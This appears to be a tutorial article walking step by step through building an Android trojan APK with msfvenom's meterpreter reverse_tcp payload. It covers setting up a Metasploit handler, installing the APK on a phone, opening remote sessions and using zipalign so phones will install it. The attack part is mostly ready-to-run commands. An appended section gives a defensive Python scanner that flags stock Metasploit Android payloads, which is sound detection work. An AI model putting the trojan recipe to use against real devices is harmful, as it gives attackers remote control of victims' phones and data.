Metasploit is an open source security vulnerability detection tool that helps security and IT professionals identify security issues, validate vulnerability mitigation measures, and manage expert-driven security assessments to provide true security risk intelligence. Its features include intelligent development, code auditing, web application scanning, and social engineering. Teams work together in Metasploit and present their findings in consolidated reports.
Environment preparation:
Kali 2.0 (msfvenom, Metasploit)
Android phone or Android simulator
Exploitation process:
Check the local IP address first.
Use msfvenom to generate the APK Trojan:

    msfvenom -p android/meterpreter/reverse_tcp lhost=172.16.105.184 lport=5555 R > /root/apk.apk

Comments:
lhost = the host that receives the reverse connection
lport = the port on which that host listens for the reverse connection
Change 172.16.105.184 to your local IP address; 5555 is the port number, and /root/apk.apk is the path of the generated APK.
The build succeeds as shown in the instructions!
Start Msfconsole
Enter the command:
Then execute the following commands to load the module, select the payload, and view the parameter settings:

    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    show options

This payload has two parameters to set: lhost and lport, the address and the port. The default port is 4444. Now let's change the settings. The address is the IP address we used when we generated the Trojan, and the port is the listening port we configured when we generated the Trojan:

    set lhost 172.16.105.184
    set lport 5555
After the configuration is complete, we can check whether it was applied:

    show options

Finally, we install the generated APK file on the simulator or the phone and then execute the following, which starts listening and waits for the phone to come online:

    exploit

We can see that a session with an ID has connected to the local machine. Now we can view the connection status and then connect to the session whose ID is 1:

    sessions
    sessions 1
Now we can execute
More command parameters can be viewed using the help command
PS: If anything is unclear during the process or you run into problems, leave a message below the article and it will be answered as soon as it is seen.
Some phones will not install the generated APK file. In that case we can process it with the zipalign tool:

    zipalign -v 4 apk.apk napk1.apk
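A defender-side check for the kind of APK this walkthrough produces, as an added example that is not part of the original article: it scans an APK's classes*.dex and AndroidManifest.xml for the package name `com.metasploit.stage` used by Metasploit's stock Android payload template. It assumes an unmodified payload (a repackaged or obfuscated one will not match), and the sample APKs are constructed in memory.

```python
import io
import zipfile

# Package name of the stock Metasploit Android stager template
# (assumption: the payload was built unmodified, without repackaging or obfuscation).
PACKAGE = "com.metasploit.stage"
MARKERS = {
    "dex type descriptor": ("L" + PACKAGE.replace(".", "/") + "/").encode(),
    "package name (UTF-8)": PACKAGE.encode("utf-8"),
    "package name (UTF-16LE)": PACKAGE.encode("utf-16-le"),  # binary manifest strings
}
MAX_ENTRY = 64 * 1024 * 1024  # do not decompress oversized entries (zip bombs)


def scan_apk(data: bytes) -> list[tuple[str, str]]:
    """Return (entry name, marker label) pairs found in an APK given as bytes."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<file>", "not a valid ZIP/APK")]
    hits = []
    with archive:
        for info in archive.infolist():
            name = info.filename
            is_dex = name.startswith("classes") and name.endswith(".dex")
            if not (is_dex or name == "AndroidManifest.xml"):
                continue
            if info.file_size > MAX_ENTRY:
                hits.append((name, "entry too large, not scanned"))
                continue
            blob = archive.read(info)
            hits += [(name, label) for label, m in MARKERS.items() if m in blob]
    return hits


def build_sample(with_marker: bool) -> bytes:
    """Constructed test input: a tiny ZIP shaped like an APK, not a real payload."""
    pkg = PACKAGE if with_marker else "com.example.app"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        descriptor = "L" + pkg.replace(".", "/") + "/Main;"
        z.writestr("classes.dex", b"dex\n035\x00" + descriptor.encode())
        z.writestr("AndroidManifest.xml", pkg.encode("utf-16-le"))
    return buf.getvalue()


if __name__ == "__main__":
    for flagged in (True, False):
        print(flagged, scan_apk(build_sample(flagged)))
```

A match is a triage signal for an untouched payload only; an empty result does not show that an APK is clean.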